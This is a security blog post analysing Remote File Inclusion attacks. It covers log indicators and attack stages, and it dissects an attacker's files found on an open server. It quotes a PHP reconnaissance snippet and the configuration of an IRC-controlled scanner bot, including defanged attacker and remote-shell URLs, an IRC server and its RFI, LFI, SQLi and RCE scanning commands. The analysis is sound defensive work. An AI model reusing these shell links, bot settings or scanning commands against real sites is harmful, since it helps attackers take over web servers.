Andrew Martin

One of the constant threats out on the internet are Remote File Inclusion (RFI) attacks. This class of threat is simple to execute and can yield very valuable results to the attacker. With the multitude of web applications out there, there are constantly new vulnerabilities discovered. The subject is rather large so I will have to make this a series of posts whose contents will discuss the tools, tactics and infrastructure used in these attacks.

For those needing more information on what RFI attacks are and how they work, please see this wikipedia article.

To start off, RFI attacks are easy to find. If you have a website chances are an automated attack has already paid it a visit. Here are a few things to check for when looking through web access logs:

File names beginning with “id”
Files with a .txt extension (exclude robots.txt and this list will be very small)
404 errors

The steps involved in most RFI attacks are as follows:

1. Attackers scan the internet via a bot that checks several search engines to find vulnerable web applications.
2. Once a vulnerable site is found, it is marked with an ID tag of sorts
3. The scanner then tracks these ID tags and uploads a second script to gather basic information on the machine.
4. The attacker then uploads a php shell which gives them control over the device
5. More tools are uploaded such as other PHP IRC bots

To get a little inspiration I headed over to honeynet.cz and looked through some recent RFI attacks they received.
To truly understand an attack, it is best to obtain the attacker’s code. After a few minutes of searching, I found a
RFI attack site who’s directory was unsecured (note that this is all publicly obtainable information).

Honeynet.cz RFI attacker: hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid

The chid file is a text file which is used as step 3 from the list above. Here are some of it’s contents:

echo "rzor was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";

Attacker files

bot.txt is fairly self explanatory, this is an RFI scanning bot
which contains everything you need to know, including:

IRC server / channel the bot connects to
Administrative credentials to disable the bot
Commands accepted
Attacker information
Related URLs

Here is some of the pertinent information: 

my $id     = "hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid?";  #Your RFI Response
my $shell  = "hxxp://skoolage.angelfire.com/other.txt?";                #Shell printed on the Vulnerable Site
my $ircd   = "irc.ccpower.org";                                         #Irc-Server
my $port   = "6667";                                               #Irc-Server Port
my $chan1  = "#rfi";                                               #Chan for Scan
my $chan2  = "#rfi";                                               #Results will be printed here too
my $nick   = "[Lock]|ON|[stratos][".int(rand(1000))."]";           #Nick
my @admins = ("rzor");

my $killpwd   = "XXXXX"; #Password to Kill the Bot
my $chidpwd   = "XXXXX"; #Password to change the RFI Response

[+] Coded by rzor
[+] Contact: rzor[at]Gmail[dot]Com
[+] Keep it private !
[+] *New release, more fun 
[+] *Updated to: 4/11/2008

!rfi <bug> <dork> -p <sites/proc> > Start the RFI Scanner
!lfi <bug> <dork>  > Start the LFI Scanner
!sql <bug> <dork> -p <sites/proc>  > Start the SQL Injection Scanner
!rce <bug> <dork> -p <sites/proc>  > Start the RCE Scanner

This bot (Scanner V6) is originally written by 0sirys, each attacker usually re-brands it with
their nickname and email. You can find websites compromised with Osirys's bot by googling for "Osirys was here"

The directory contains another RFI scnaning bot (rfiscan.txt) and some other curious tools
in the /rapi and /tr directories. 

The /rapi/ directory contains a script to check to see if a given rapidshare account is valid.
I don't know the specific reason for checking this, but if anyone does know, please leave a comment. 

The /tr/ directory contains a script (written in Spanish) to harvest email accounts by searching various search engines.

Harvester

As you can see RFI attacks can be quite deadly but can be easy to disect. The series will continue in
the next few days with more RFI attacks. Copies of these files are available to members of the
security community, please drop me line if you are interested.